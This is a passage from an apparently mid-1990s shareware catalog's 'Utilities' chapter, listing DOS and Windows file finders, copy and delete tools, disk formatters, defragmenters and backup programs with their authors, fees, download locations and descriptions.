for assistance). + SWREG#: 4186 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + * Full-screen directory editor + * Disk & directory manager + * Backup & recovery utility + * File finder, viewer & patcher + * Hex/text string finder & replacer + * Sector editor, RAM editor + + Chapter 2, "Utilities" 14 + + + + * Powerful DOS shell + ...and MUCH more! + + "Reviewers" say: + "The interface ... is elegant." + "...clean, easy-to-use, well-written program." + "...quality of product we've seen from Peter Norton." + + + Product: Examine + Author: Aquila Software (Trevor Poile), +44-(0)1892-531108 + Version: 1.12 (08-08-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXAMN112.ZIP on BBSs. + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + A fast and versatile text search utility that can search both + text and binary files using either ordinary words or GREP-like + regular expressions, the UNIX searching utility, for more + sophisticated searches. Searches can be across multiple drives + over networks or can be restricted to a single directory with + the option of searching subdirectories if so desired. Files can + be viewed either with their associated application or with the + program's own fully configurable internal viewer. + + + Product: ExamineZip + Author: Aquila Software (Trevor Poile), +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXZIP101.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + Searches for files and text within files stored in ZIP archives + created with PKZIP (v2.0 or below). File searches can use DOS + wild-cards while text searches can use either ordinary words or + GREP-like regular expressions. Each search can be across + multiple drives over networks or can be restricted to a single + + Chapter 2, "Utilities" 15 + + + + directory. The program can also be used as a fully functional + UNZIP utility where the contents of an archive can be listed, + viewed, tested or extracted to disk. PKUNZIP is not required. + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 26. + + Product: Jason's File Finder + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 2.0d (09-03-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $10.00 + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: JFF20D.ZIP on BBSs (call 317-784-2147 to download it at + no charge); JFF.ZIP on CompuServe in CIS:PCUTIL forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 1493 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Powerful, fast, and extremely easy-to-use DOS file finder. Will + search for multiple file specs, and accepts standard DOS + wildcard characters. Searches across multiple drives, either + specific or a "range" of drives, and can also search in + specific directories. Accepts any combinations of the above. + Optionally, can perform a DOS command on every file found. Will + also calculate total byte counts for found files. + + + Product: PALERT + Verify enough disk freespace before using pgm. See full + description on page 98. + + Product: PCOPY + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 9.3 (09-01-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PCOPY93.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PCOPY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + + Chapter 2, "Utilities" 16 + + + + PCOPY93.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The COPY utility DOS should have provided. Even with DOS 6.0, + DOS COPY can be dangerous to use and has limited options. + Abundant options include: Multiple output disks, fill disks + efficiently, split files across disks, select files by date/ + time/size, update/merge dirs and more. Special *DISK*.* type + wildcards. Scan/Make directories, prevent accidental file + overlays. Menu or command driven. Featured in PC Computing July + 1991 - Taming your Hard Disk by Preston Gralla. + + + Product: PDEL + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 4.4 (05-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PDEL44.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDEL.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PDEL44.ZIP on + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 62k (about five minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The file delete utility that DOS should have provided. + Extensive file selection capabilities let you delete just what + you want. Select by date/time, size, attribute, special + wildcard patterns like *DISK*.* and mode. Delete until a + specified amount of freespace exists. Wipe file data before + deleting to prevent file undelete. Test feature simulates + delete. Emergency stop by pressing any key. Recommended in PC + Computing July 1991 - Taming your Hard Disk by Preston Gralla. + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 156. + + Product: Practical Joke Collection + Three harmless practical jokes for DOS. See full description + on page 610. + + Chapter 2, "Utilities" 17 + + + + Product: PSEARCH + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 5.2B (07-01-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PS52B.ZIP on BBSs (call 909-352-2820 to download it at + no charge); PSRCH.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PS52B.ZIP on + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 99k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Used by thousands to locate files on hard disks. You provide + words or phrases, and it will scan directory(s) to find files + containing the text. Extensive file selection and pattern + matching are provided. Provides intelligent display of found + text with scroll back and program launcher. Saves search + results for later review. Recommended in PC World as one of the + Best of Shareware products in 1990 (October 1990). + + + Product: PTOUCH + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 2.0 (02-03-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PTOUCH2.ZIP on BBSs (call 909-352-2825 to download it + at no charge). + Download size: 15k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you modify the date and time DOS keeps in file directories + for each file. You may either set them to the current date/ + time or to any specific value you desire. Useful for + correcting date/time when the system clock was improperly set. + Can also be used to set a group of files to the same date/time + value. This helps associate them as a synchronized group. + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 32. + + Chapter 2, "Utilities" 18 + + + + Product: Stowaway True Archival System + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 2.2 (07-29-93) + Needs: IBM PC, DOS 3.2 or better. Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 51/4" master disk(s). 3 + months of support. 1-month return policy. + Look for: STOW191.ZIP on BBSs (call 909-352-2825 to download it + at no charge); STOW.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + STOW220.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Frees hard disk space by archiving inactive files from hard + disks to a library of offline archive disks. Use its directory + manager to select data to be archived. It works like a backup + program to move the files to diskette while indexing them on + your hard disk. Has data compression, automatic diskette + formatting, viewing of files prior to archival and much more. + Very professionally implemented! + + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 21. + + Product: XED + Hex/binary file editor w/ INS+DEL, S&R. See full description + on page 54. + + 2.1.2.1 Optimization & defragmentation + + Product: SpeedBack + Author: MicroTools Inc (Robert J. Japenga), 203-651-6170 + Version: 2.3 (02-12-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hercules monitor; Hard disk; + Mouse. + Registration fee: $17.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus utilities; disks of other shareware. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; SPDBK.ZIP on CompuServe + in CIS:PCHW forum LIBrary 1 (or contact userID 72077,437 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A fast and user friendly disk defragmenter. Using a special + algorithm to minimize movement of data, files are moved to the + front of the disk and placed in contiguous clusters. + + Chapter 2, "Utilities" 19 + + + + Directories are also moved ahead of data files and cleaned up + to remove extra records. Works on all size drives and has an + easy to use mouse/hot key interface. Gets the speed back on + your favorite drive. Defragments disks with up to 24,000 + files! + + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 11. + + 2.1.3 Floppy disk utilities + + Product: Disk Drive Cleaner + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.50 (add $3.50 for shipping to U.S. + addresses) (add $4.75 for shipping to Canadian addresses) (add + $5.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, mail support; LAN license; site + license; all ASP-wide offers (see page 6). Bonus cleaner kit + (includes solvent & non-abrasive cleaner disk). + Look for: CLEANER1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Cleans floppy disk drive heads safely & effectively, preventing + data loss, unreliable performance and errors due to microscopic + foreign particles, dirt, dust, oxides and smoke that + accumulates on heads. Preventative maintenance takes only about + four minutes and requires no removal or mechanical disassembly + of the disk drive hardware. + + + Product: DISKLIST + Author: Gulf Sierra, 301-460-0354 + Version: 3.06 (01-25-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $35.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: DISKL306.ZIP on BBSs (call 202-547-2008 to download it + at no charge); DSK306.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 9 (or contact userID 73270,77 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Produces diskette lists & labels with the directory contents + for 5.25", 3.5", and hard disks in 39 formats. Reads all sub- + dirs. Prints different or duplicate lists on every label on + Avery Laser label sheets. Prints on disk sleeves with PCL5. + + Chapter 2, "Utilities" 20 + + + + Font downloading. Optionally displays file names in ZIP, ARC, + PAK, ZOO, and LHZ. DISKFLAP holds non-sticky list to 3.5" + disks. Configure layout of top of list. Prints on all printers, + video screen or a file. + + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 26. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: FreeForm + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.3 (11-01-94) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support; all ASP- + wide offers (see page 6). 3-month free upgrading allowed. + Look for: availability unknown on BBSs; FF23.ZIP on CompuServe in + CIS:PCHW forum LIBrary 0 (or contact userID 72060,1153 for + assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Description: + Formats all styles of standard DOS disks, as well as non-DOS + disks, and customized DOS disks (i.e you can make up your own + copy protection schemes.) Gives complete control over + formatting parameters such as sector size, disk density, # of + sectors and tracks. Menu driven, user configurable formatting + parameters. + + + Product: Jason's File Finder + DOS file finder, searches multiple drives. See full + description on page 15. + + Chapter 2, "Utilities" 21 + + + + Product: MAXI Form + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 1.8 (12-01-93) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. 360k/720k/1.2meg/1.44meg + floppy drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 2-month + free upgrading allowed. + Look for: availability unknown on BBSs; MAXI*.ZIP on CompuServe + in CIS:PCHW forum LIBrary 1 (or contact userID 72060,1153 for + assistance); MAXI*.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Description: + A floppy disk formatting program that gives more space on a + disk: 360k disks are expanded to 420k, 720 becomes 800k, 1.2 + meg becomes 1.4 meg and 1.44 meg is boosted to 1.6 meg. The + disks are user transparent to DOS version 3.20 or later and can + be used interchangeably with normal DOS disks. + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 110. + + Product: PDEL + Safe/Precise DOS delete. Extensive features. See full + description on page 16. + + Chapter 2, "Utilities" 22 + + + + Product: WinUpD8R + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 4.2 (02-13-96) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $29.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of fax, CompuServe, mail support; lifetime return + policy; bonus utilities; disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: UPD8R_42.ZIP on BBSs (call 703-680-9269 to download it + at no charge); UPD8R.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 311k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + If you use "floppy net" to move files back and forth between + computers, you need WinUpD8R! It can automatically keep your + files up-to-date on multiple machines while providing triple- + redundant backup of your data in the process. Many available + modes, including batch operation. No cables or modem transfers + necessary. + + + 2.1.3.1 Disk duplicating + + Product: Master Disk + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 2.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $179.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; all ASP-wide offers (see + page 6). + Look for: MASTER20.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 73k (about six minutes with a 2400 baud modem) + Description: + Prepares floppy diskettes used as masters for software + duplication and distribution. Software duplicated from these + originals are more reliable and resistant to virus + contamination. It examines the diskette and drive for flaws and + errors, and verifies the quality and integrity as being + suitable for use as the original master, fills unused sectors + and boot tracks with special security code. Documentation + includes extensive anti-virus test data. + + Chapter 2, "Utilities" 23 + + + + Product: SAB Diskette Utility + Author: Stewart A. Berman (Stewart Berman) + Version: 2.50 (01-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $7.50 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 6-month free + upgrading allowed. + Look for: SABDU250.ZIP on BBSs; SDU250.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 76366,1664 for + assistance). + SWREG#: 1256 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + The Windows diskette utility. Using disk drives under Windows + is easy & efficient when you can: + * Format/copy/compare/save floppy diskette images in + foreground or background + * Read a diskette once and make multiple copies + * Save images to hard drive + * Convert diskette image formats while preserving boot and + reserve sectors + * Create distribution sets with group restores + * Browse diskettes and saved diskette images + Includes extensive online help + + + 2.1.3.2 Disk formatting + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 22. + + 2.1.4 Directory utilities + + Product: CommEx + Common dialog extensions for Windows 3.1/3.11. See full + description on page 168. + + Product: File-Ex + Adds file management functions to file dlgs. See full + description on page 169. + + Product: File_Handle Filer/Finder/Shell + Integrated DOS stereo file & program manager. See full + description on page 154. + + Chapter 2, "Utilities" 24 + + + + Product: SuperDIR + Author: Cottonwood Software, 913-663-3022 + Version: 1.1 (08-20-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; lifetime limited return policy; royalty-free source + code; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; SUPDIR.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 2 (or contact userID 75264,1630 for + assistance). + SWREG#: 5329 + PsL#: 11950 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A DIR-type utility with include/exclude filters. Also formats + for DB import, multiple include and exclude file and directory + masks, many sorting, filtering, and output options, can sort + ALL files in tree (not just within each subdirectory). Comma, + tab, and space delimited output can be piped to a file or to a + DOS program. (For example, pipe all .BAK files to a utility to + delete them.) Source is royalty-free object-based C++. + + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 116. + + + 2.2 File utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 91. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 91. + + Chapter 2, "Utilities" 25 + + + + Product: 4FILES + Author: Hand-Crafted Software (Larry T. Edwards), 907-747-8996 + Version: 3.23 (08-25-95) + Needs: IBM PC, DOS 3.0 or better. 128k RAM. + Strongly recommended: 4DOS or NDOS. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + GEnie, mail support; 1-month return policy; bonus utilities; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: 4FILE323.ZIP on BBSs (call 718-837-3236 to download it + at no charge). + PsL#: 10574 + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + System enhancer & file manager makes all of your work easier! + * Combines fast directory navigation with finger-tip + launching & loading of your data files & utilities + * File management functions & archiving support 4DOS/NDOS + file descriptions + * Works from a sortable directory listing that shows and + edits file descriptions + * Runs well with DOS, OS/2, Windows & DESQview + * Easy on-the-fly configuration & registration branding + * Recommended by 9/94 PC Computing magazine + + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 92. + + Product: ComeBack + Author: MicroTools Inc (Robert J. Japenga), 203-651-6170 + Version: 3.0 (01-06-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; CGA monitor; + Hercules monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Can recover files that were deleted or even overwritten. It + can recover files even after you have written over the + directory entry. Easy to use. No searching through sectors. + Mouse/Hot key user interface makes recovering files a snap. + Works on all size hard drives. Over 40,000 registered users of + this product swear by it! + + Chapter 2, "Utilities" 26 + + + + Product: CommEx + Common dialog extensions for Windows 3.1/3.11. See full + description on page 168. + + Product: DizView + Author: Lincoln Beach Software (Harold Holmes), 314-861-1500 + Version: 2.0 (06-09-95) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited fax, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: DIZVUE20.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DIZVUE.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 11790 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Catalog all your ZIP files! Ever wonder just what all those + ZIP files were? Now you can look at them without opening every + one of them manually. This will gather all of the FILE_ID.DIZ + files from your archives in a directory and put them in menu to + view by files or by subdirectory. Now you can catalog all of + your directories, edit each description and resave it to the + catalog and your ZIP file. Sysops!! Now create a custom + FILES.BBS file for your BBS. + + + Product: Double Directory + Author: 100% Cotton Software, 717-289-4019 + Version: 1.40 (06-01-93) + Needs: IBM PC, DOS 2.0 or better. 272k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $15.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus utilities; disks + of other shareware. + Look for: DBLDIR14.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + A file and disk manager that displays 2 directories side-by- + side. Scroll through both simultaneously. Compare them & tag + the differences. Copy, move, rename, delete, view, print and + change attributes of files. Sort, make, mask, and remove + directories. Shell to DOS or shell and run a program (w/ or w/o + Double Directory removed from memory). 25-, 43-, and 50-row + modes. Many configuration options. Point and shoot interface + and mnemonic commands. Context-sensitive help. + + Chapter 2, "Utilities" 27 + + + + Product: File Finder/Grouper + Author: EnGamma, 703-548-6869 + Version: 2.02 (04-16-95) + Needs: IBM PC, DOS 3.3 or better. 180k RAM. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; 1-month return policy; bonus data; all ASP-wide + offers (see page 6); disks of other shareware; registration + commissions. 24-month free upgrading allowed. + Look for: availability unknown on BBSs; FFG.ZIP on CompuServe in + CIS:PCSYS forum LIBrary 6 (or contact userID 71674,1747 for + assistance). + SWREG#: 1558 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + The best file finder! Use multiple date/time/size/day-of-week + ranges, attrib., text as criteria to find or exclude files and + group them for subsequent processing. Search ZIP/ARC/LZH/ARJ/ + ZOO. All or specified drives. Use *abc* wild cards. Create + database of files. Execute files or arbitrary DOS command for + each. Use relative date/time. Output is user configurable. + + + Product: File_Handle Filer/Finder/Shell + Integrated DOS stereo file & program manager. See full + description on page 154. + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 109. + + Chapter 2, "Utilities" 28 + + + + Product: MicroFox DOS Utilities + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 1.15 (01-01-96) + Needs: IBM PC, DOS 1.0 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: US$10.00 (add US$2.00 for shipping to U.S. + addresses) (add US$3.00 for shipping to Canadian addresses) + (add US$5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware; discounts on other products. + Look for: UTL115.ZIP on BBSs (call 216-661-9065 to download it at + no charge); UTL115.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 0 (or contact userID 73057,3113 for assistance); + UTL115.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + MicroFox Utilites for DOS. Printer utilities. Batch file + utilities. Screen utilities. File utilities. + + + Product: PATTR + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 1.5 (11-05-90) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $19.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PATTR15.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PATTR.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Sets DOS attributes for one or more files. Can process one or + more directories with a single command and advanced file + selection capabilities are provided. It is commonly used to + set or reset the DOS archive flag to cause or prevent files + from being processed by your favorite backup utility. + + + Product: STEENBURGH's STUFF + 23 batch utilities, input, output, etc. See full description + on page 99. + + Chapter 2, "Utilities" 29 + + + + Product: WinAlter + Author: James Bair Software + Version: 2.1 (11-11-95) + Needs: IBM AT (80286), Windows 3.0 or better. Hard disk; + VBRUN300.DLL. + Registration fee: $10.00 (add $2.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of CompuServe, mail support; + 12-month return policy; all ASP-wide offers (see page 6); + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; WINALT21.ZIP on + CompuServe in CIS:WINUTIL forum LIBrary 5 (or contact userID + 70730,3001 for assistance). + SWREG#: 7427 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Alter Date, Time, Attributes of Files without leaving Windows! + Other programs help you alter Date, Time, & Attributes; now you + can do it without leaving Windows or going into DOS. Easy to + use Windows interface with thorough Help file. Can handle many + files at a time. Includes drag & drop capabilities. + + + 2.2.1 Backup/restore + + Product: Backer + Author: Cordes Development (Bernd J. Cordes), +49-40-494370 + Version: 2.99 (03-24-96) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $29.95 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; BACKEE29.ZIP on + CompuServe in CIS:WINSHARE forum LIBrary 6 (or contact userID + 100334,375 for assistance). + SWREG#: 4310 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Windows utility for synchronizing and updating directories and + files via network, disk, IR, or cable. Backer keeps all your + computers and disks up-to-date. With Backer you can: + synchronize files within a work team; synchronize your notebook + before you travel and your desktop afterwards; transfer files + between your office and your home; backup your day's or week's + work; keep current copies of system files on disk to be + prepared for a crash; and many things more. Can cope with large + volumes. + + Chapter 2, "Utilities" 30 + + + + Product: Backup Fugue + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 1.1 r3 (12-12-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM. Expanded memory + 4Meg or better. + Registration fee: $39.00 (add $12.00 for shipping to U.S. + addresses) (add $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6). Removal of + shareware screens. + Look for: availability unknown on BBSs; BU4D.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 0 (or contact userID 100036,311 for + assistance). + Download size: 580k (about 43 minutes with a 2400 baud modem) + Description: + Backup program for large hard disks. Works with all know sizes + of hard disk (eg 1G, 2G etc) depends on available extended + memory. Works with networks, and can backup across network. + Maintains version control, so you can use it for archival + purposes as well. Compresses data written to the backup. + Industrial strength, designed to survive power failures during + backup. Need only take a full backup once, program will keep + track of files which have changed and back up only changed + files next time. + + + Product: Crush + Create much smaller archives than PKZIP! See full description + on page 36. + + Product: Easy Backup + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 6.1 (12-06-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; EBAK.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 100410,717 for + assistance). + SWREG#: 3044 + PsL#: 11492 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Makes compressed self restoring backups. Backup parameters are + stored in a data file so subsequent backups can be menu + selected. There are options to backup one or more named + directories with their sub directories, without their sub + directories or the sub directories only. + + Chapter 2, "Utilities" 31 + + + + Product: FSave + Author: KMR Consulting (Kenneth A. Reek), 716-293-3241 + Version: 1.1 (03-15-95) + Needs: IBM AT (80286), DOS 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + Hard disk. PKZIP or other compression/archiving program. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian 